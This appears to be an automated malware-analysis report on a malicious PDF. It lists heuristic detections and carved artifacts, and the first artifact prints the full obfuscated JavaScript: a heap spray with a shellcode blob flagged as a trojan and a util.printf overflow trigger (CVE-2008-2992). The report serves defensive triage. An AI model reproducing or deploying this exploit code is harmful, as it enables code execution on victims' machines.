Verdict: MALICIOUS
Risk score: 446

Machine learning
- Nyx PDF Classifier malicious score 1.0000

Heuristics (8)
- util.printf — CVE-2008-2992 (critical; CVE exact; rule CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
- ClamAV: Heuristics.PDF.ObfuscatedNameObject (critical; rule CLAMAV_DETECTION): ClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
- Hex-obfuscated scripting name object (critical; rule PDF_OBFUSCATED_NAME_OBJECT): A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
  var uW = unescape("%u9946%u3737%u4a9b%u9992%u9f98%u27f8%uf890%u4798%u9247%u4396%u4137%u2f2f%ufcfc%u4f27%u9899%u4b4f%u9740%u414e%u4997%u4f90%u9ff8%u9148%u40fd%ud6f8%u4ad6%u2f4a%uf9fd%uf890%u47fd%u404a%uf92f%u4947%u3749%u974e%uf937%ufc97%u4ef8%u4996%u9ff8%u9740%u3f42%u492f%u9092%u3f98%u4a40%u2f47%u4b4e%u4ef5%u4843%u46fd%u4892%u4142%u4a46%u47f9%u994b%u4949%u3f99%ufc96%u4afd%u9996%uf527%uf5d6%u9b9f%u4a92%u4641%u3f9b%u4f98%u2797%u9292%u9991%u4696%u3742%u494f%ufc46%u422f%ud6fd%u37d6%u4693%u4f2f%u4 … var oYTZbbOoC ="";
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (medium; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (3)

Files carved from inside the sample during analysis.

Artifact 1: javascript_obj0006_000.js
- Kind: pdf-javascript-stream
- Source: PDF /JS object 6 at offset 0x1B1
- Size: 4833 bytes
- SHA-256: 60ca5df0e5f4a24976a0220405349e62ce32a82c6b88638296548282860a98a4
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s). 9 of 15 identifiers look randomly generated (e.g. 'MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNF') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
var uW = unescape("%u9946%u3737%u4a9b%u9992%u9f98%u27f8%uf890%u4798%u9247%u4396%u4137%u2f2f%ufcfc%u4f27%u9899%u4b4f%u9740%u414e%u4997%u4f90%u9ff8%u9148%u40fd%ud6f8%u4ad6%u2f4a%uf9fd%uf890%u47fd%u404a%uf92f%u4947%u3749%u974e%uf937%ufc97%u4ef8%u4996%u9ff8%u9740%u3f42%u492f%u9092%u3f98%u4a40%u2f47%u4b4e%u4ef5%u4843%u46fd%u4892%u4142%u4a46%u47f9%u994b%u4949%u3f99%ufc96%u4afd%u9996%uf527%uf5d6%u9b9f%u4a92%u4641%u3f9b%u4f98%u2797%u9292%u9991%u4696%u3742%u494f%ufc46%u422f%ud6fd%u37d6%u4693%u4f2f%u4191%u9ff8%u9042%u4f37%u9149%u922f%u374e%u2f42%u4147%uf93f%u424f%u9091%u9847%ufc4f%u9142%u4e98%u4f99%u43fc%u4ed6%u9743%u4799%u9298%u489f%u4f27%uf54f%u9191%u97fd%u273f%u48f9%u48f5%uf997%u3f4f%u4e40%u9ffc%uf899%u4690%uf999%u96fd%u27fc%u974f%u4ffd%u9092%u4f92%u9390%u3792%u4143%u924e%u929f%u3ff9%ud691%ufc90%u419f%u9b4b%u4f4a%u4b92%u4090%u9893%u9141%u994b%u4842%u4f27%u9f46%u3f2f%u41f9%u492f%u3749%u46fd%u9b4e%u4e3f%u9641%u924a%u4142%u9f99%u4191%u499f%u9291%u4343%u964b%u484a%u49f5%u994b%u4097%u4747%u274f%u4ffd%u9247%u3f47%u2799%u9198%u4f42%u9846%u46f5%u9090%u97d6%u919f%uf53f%u9397%u3f42%u3737%u4091%u4649%u4ff8%u434e%u4a40%u379f%u9b37%u904b%u4e43%u4f48%u4a9b%u98f9%u91fd%uf946%u374f%u9240%ufd2f%u4237%uf5d6%u92f5%u9946%ud6fc%uf542%u9298%ufd41%u4b2f%u9690%u9b3f%u9149%ufc49%u404b%u49f8%u4737%uf942%u4192%u92f8%u4347%u2f3f%u4e40%u9b97%u3740%u91fd%u4a96%u273f%u4efd%u4642%uf827%u3f96%u9097%u904e%ufc2f%u974e%ufc4b%u9f47%u904f%u4ed6%u9997%u4091%u4f90%u2f9f%ufc2f%u999b%u2790%u9f98%u9b9b%u4f27%u4b48%ufd4b%ud627%u9942%u4ffd%u4e46%u3f40%u4898%uf946%ufc37%u9990%u4198%ufd47%u4392%u2743%ud697%ufd4e%u914e%u3ffc%ufd37%ud693%u4927%u279b%u934e%u922f%u27f5%u4a98%u9741%u274b%u9741%u9bfd%ufdf8%u4a4e%u4992%u4ad6%u9199%uf8f9%u9292%uf949%u9b4e%u92d6%u4696%u99f5%u4790%ufc92%u919f%u46f5%u2740%u9237%ufdfd%u96f9%u9f48%uf547%ufc47%u4749%u9746%u412f%u9096%u924a%uf547%u414f%u9941%u4190%u9f41%u463f%u9343%u9f47%uf8f9%u40fc%u41f9%u4a42%u484f%u9b4e%u4691%u3f99%uf54b%u9992%u9796%ufc46%u4896%u42d6%u4248%u4af5%u9640%u3799%u96d6%
u2f91%uf54f%u4e90%ufd4f%u3f2f%u4649%uf599%u9349%u483f%u40fd%u499b%u404f%u414b%u97d6%u4891%u9291%u499f%u4291%uf891%u994e%u2743%u4f97%u4e3f%u4f48%u2ff5%u4a9f%uf848%u494b%uf94a%u912f%uf946%uf991%u9943%u92fc%ud690%ufd4a%u9640%u4f91%u4897%u484a%u924f%u4737%u9846%u4893%u98f8%ufd3f%u4ffc%u9bf5%u434a%u4f4a%u974a%u97f5%u4696%u3747%u964f%u9ffc%u409b%uf997%u4643%ufd3f%u3790%u9b40%u40f5%u464f%u99d6%u9246%u92f5%u3799%u9190%u9ffc%u4898%uf537%ud0db%u81bf%u0928%ud988%u2474%u5af4%uc931%u31b1%u7a31%u8318%ufcea%u7a03%uca95%u74fc%u887d%u84ff%ued7d%u6176%u2d4c%ue1ec%u9dfe%ua766%u56f2%u5c2a%u1b81%u53e3%u9122%u5ad5%u8ab3%ufc26%ud137%ude7a%u1a06%u1f8f%u474f%u4d62%u0318%u62d1%u592d%u09ea%u4f7d%ued6a%u6e35%ua05b%u294e%u427b%u4183%u5c32%u6cc0%ud78c%u1a32%u3e0f%ue30b%u7fbc%u16a4%ub8bc%uc902%ub0cb%u7471%u06cc%ua208%u9d59%u21aa%u79f9%ue54b%u0a9c%u4247%u55ea%u554b%uee3f%ude77%u21be%ua4fe%ue5e4%u7e5b%ubc84%ud101%udfb9%u8eea%uab1f%uda06%uf62d%u1d4c%u8ca3%u1d22%u8ebb%u7612%u058a%u01fd%ucc13%ufeba%u4d59%u96ea%u0707%ufaaf%ufdb7%u02f3%uf434%uf08b%u7d24%ubd8e%u6de2%uaee2%u9186%uce51%uf182%u5c34%ud84e%ue4d3%u24f5");
var oYTZbbOoC ="";
for (hDngKjtDnUZZrilZLNdcIKicqylLLZnmgLiIhcqzCiOzKVszmoRcHOEBCCbvIjZQP=128;hDngKjtDnUZZrilZLNdcIKicqylLLZnmgLiIhcqzCiOzKVszmoRcHOEBCCbvIjZQP>=0;--hDngKjtDnUZZrilZLNdcIKicqylLLZnmgLiIhcqzCiOzKVszmoRcHOEBCCbvIjZQP) oYTZbbOoC += unescape("%u49fd%ufd4b");
MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNFgERoHzwGsvHjlzznJfvmUZtMxMfgZraNqWJmAewXmoqU = oYTZbbOoC + uW;
yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ = unescape("%u49fd%ufd4b");
uUgBLoeqCajgJtEEIHNCdSDzQLVwGUcbLNY = 20;
PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx = uUgBLoeqCajgJtEEIHNCdSDzQLVwGUcbLNY+MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNFgERoHzwGsvHjlzznJfvmUZtMxMfgZraNqWJmAewXmoqU.length
while (yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.length<PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx) yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ+=yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ;
nYiTphahdIxI = yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.substring(0, PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx);
eTOvRfSbnZszuVa = yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.substring(0, yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.length-PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx);
while(eTOvRfSbnZszuVa.length+PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx < 0x40000) eTOvRfSbnZszuVa = eTOvRfSbnZszuVa+eTOvRfSbnZszuVa+nYiTphahdIxI;
rYmZNTwUdpxWnrVdGHFatyhomAaIyPdg = new Array();
for (RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO=0;RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO<1450;RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO++) rYmZNTwUdpxWnrVdGHFatyhomAaIyPdg[RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO] = eTOvRfSbnZszuVa + MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNFgERoHzwGsvHjlzznJfvmUZtMxMfgZraNqWJmAewXmoqU;
util.printf("%45000.45000f", 0);

Artifact 2: javascript_obj0006_000_shellcode_00.bin
- Kind: pdf-js-shellcode
- Source: pdf-js-unescape-shellcode recovered from PDF /JS object 6 at offset 0x1B1
- Size: 1024 bytes
- SHA-256: 01ae90eea1d8dc31c49900ac1d197a92a4c4e877185910e2caf472efa690ae09
- Detection (ClamAV): Win.Trojan.MSShellcode-6360729-4
- Obfuscation or payload: unlikely

Artifact 3: generic_stage_recovery_000.js
- Kind: deobfuscated-js
- Source: generic stage recovery percent-decode from JavaScript object 6 at offset 0x1B1
- Size: 4831 bytes
- SHA-256: 1b1b3f9708e11c9b478a38aea7b94c1fec3844e832def57220afb8a2b033fb71
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s). 9 of 15 identifiers look randomly generated (e.g. 'MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNF') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script). The recovered stage is identical to the javascript_obj0006_000.js preview above except for its final line, where the percent-decode pass turned the leading "%45" of the "%45000.45000f" format string into the byte 0x45 ('E'):
util.printf("E000.45000f", 0);